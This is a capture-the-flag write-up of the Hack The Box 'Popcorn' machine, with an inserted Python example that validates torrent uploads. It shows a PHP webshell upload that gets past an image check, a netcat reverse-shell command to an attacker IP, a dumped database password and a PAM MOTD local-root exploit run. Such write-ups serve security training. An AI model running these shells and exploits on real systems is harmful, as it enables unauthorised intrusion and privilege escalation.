Popcorn

Recon

└──╼ $whatweb http://popcorn.htb/
http://popcorn.htb/ [200 OK] Apache[2.2.12], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.12 (Ubuntu)], IP[10.129.161.86]
$nmap -p- -A 10.129.161.86
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12
|_http-title: Did not follow redirect to http://popcorn.htb/
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel

At /test.php we can see the server's entire configuration; the screenshot shows just the beginning.

/torrent gets us Torrent Hoster from 2007.

The upload button immediately got my attention. To access this panel we have to create an account, but registration is open, so that's not a problem.

We can upload a .torrent file and make it accessible to others. I tried to edit the data being sent, but my php webshell was not considered a valid torrent file for some reason.

Pressing Edit torrent gets us a new window.

We can upload a cool cat picture for our cool Linux distro. Now let's upload an even cooler webshell. First I tried changing both the content type and the file type. Got Invalid file. Then, just the file type. Got Invalid file. Lastly…

The webshell does not render as a nice image on this site, but we can right-click it and open it in a new tab to see it in its full glory.
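The upload check above only looked at what the client claimed about the file. As an added example (not code from the writeup or from Torrent Hoster), here is a content-based check that parses the uploaded bytes as a torrent metainfo file, so the Content-Type header and file name no longer matter; the valid torrent and the PHP blob are constructed samples.

```python
# Added example (not from the writeup or Torrent Hoster): validate an upload by
# parsing it as bencode instead of trusting the client-supplied Content-Type or name.

def bdecode(data: bytes):
    """Decode one bencoded value; raise ValueError on anything malformed."""
    def parse(i):
        c = data[i:i + 1]
        if c == b"i":                         # integer: i<digits>e
            end = data.index(b"e", i)
            return int(data[i + 1:end]), end + 1
        if c in (b"l", b"d"):                 # list l...e or dict d...e
            items, i = [], i + 1
            while data[i:i + 1] != b"e":      # runs off the end -> parse() raises
                value, i = parse(i)
                items.append(value)
            if c == b"l":
                return items, i + 1
            keys, vals = items[::2], items[1::2]
            if len(keys) != len(vals) or not all(isinstance(k, bytes) for k in keys):
                raise ValueError("dict needs byte-string keys, each with a value")
            return dict(zip(keys, vals)), i + 1
        if c.isdigit():                       # byte string: <len>:<bytes>
            colon = data.index(b":", i)
            n, start = int(data[i:colon]), colon + 1
            if start + n > len(data):
                raise ValueError("truncated byte string")
            return data[start:start + n], start + n
        raise ValueError("unexpected byte at offset %d" % i)

    value, end = parse(0)
    if end != len(data):                      # rejects a real torrent with a payload appended
        raise ValueError("trailing data after bencoded value")
    return value

def is_valid_torrent(data: bytes) -> bool:
    """True only for a metainfo dict whose info dict carries the mandatory fields."""
    try:
        meta = bdecode(data)
    except (ValueError, RecursionError):      # malformed, truncated, or absurdly nested
        return False
    info = meta.get(b"info") if isinstance(meta, dict) else None
    if not isinstance(info, dict):
        return False
    return isinstance(info.get(b"name"), bytes) and isinstance(info.get(b"piece length"), int)

# Constructed samples: a minimal valid metainfo file, and PHP uploaded under a .torrent name.
GOOD_TORRENT = (b"d8:announce20:http://tracker.test/4:infod4:name8:file.bin"
                b"12:piece lengthi262144e6:pieces20:" + b"\x00" * 20 + b"ee")
PHP_PAYLOAD = b"<?php echo 'not a torrent'; ?>"
```

Accepted files should still be written with a server-chosen name and a fixed .torrent extension to a directory the web server does not execute scripts from.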

Running ls /home gets us the home folder of george. Unfortunately he does not have a .ssh directory in his home, so we have to run a reverse shell.

# on victim
nc -e /bin/sh 10.10.16.30 4444

# on host
nc -lvnp 4444

Shell stabilisation for QoL.

python -c 'import pty;pty.spawn("bash")'
^Z
stty raw -echo 
fg

Priv Esc

Running linpeas gets us only the site's database credentials.

══════════╣ Searching passwords in config PHP files
/var/www/torrent/config.php:	$dbpass 	= $CFG->dbPassword;
/var/www/torrent/config.php:	$dbuser 	= $CFG->dbUserName;
/var/www/torrent/config.php:  $CFG->dbPassword = "SuperSecret!!";	//db password
/var/www/torrent/config.php:  $CFG->dbUserName = "torrent";    //db username

Let's see what we have in the home directory.

www-data@popcorn:/home/george$ ls -lar
total 860
-rw-r--r-- 1 george george     33 Oct 20 17:51 user.txt
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
lrwxrwxrwx 1 george george      9 Oct 26  2020 .bash_history -> /dev/null
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
drwxr-xr-x 3 george george   4096 Oct 26  2023 .
www-data@popcorn:/home/george$ ls -laR
.:
total 860
drwxr-xr-x 3 george george   4096 Oct 26  2023 .
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
lrwxrwxrwx 1 george george      9 Oct 26  2020 .bash_history -> /dev/null
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george     33 Oct 20 17:51 user.txt

./.cache:
total 8
drwxr-xr-x 2 george george 4096 Mar 17  2017 .
drwxr-xr-x 3 george george 4096 Oct 26  2023 ..
-rw-r--r-- 1 george george    0 Mar 17  2017 motd.legal-displayed

The only thing that is not standard is motd.legal-displayed.

motd.legal-displayed is a parameter related to the “Message of the Day” (MOTD) on Linux systems, specifically Ubuntu or other Debian-based distributions. MOTD is a message that is displayed to users when they log into the system via a terminal or SSH.

Looking at exploit-db, we can see that it allows us to get root quite easily. I tested it and it works flawlessly.

www-data@popcorn:~$ ./script 
[*] Ubuntu PAM MOTD local root
[*] Backuped /var/www/.ssh/authorized_keys
[*] SSH key set up
[*] Backuped /var/www/.cache
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] Restored /var/www/.cache
[*] Restored /var/www/.ssh/authorized_keys
[*] SSH key removed
[+] Success! Use password toor to get root
Password: 
root@popcorn:/var/www# ls
backup  index.html  pwn  rename  script  test.php  torrent
root@popcorn:/var/www# cd /root
root@popcorn:~# ls
root.txt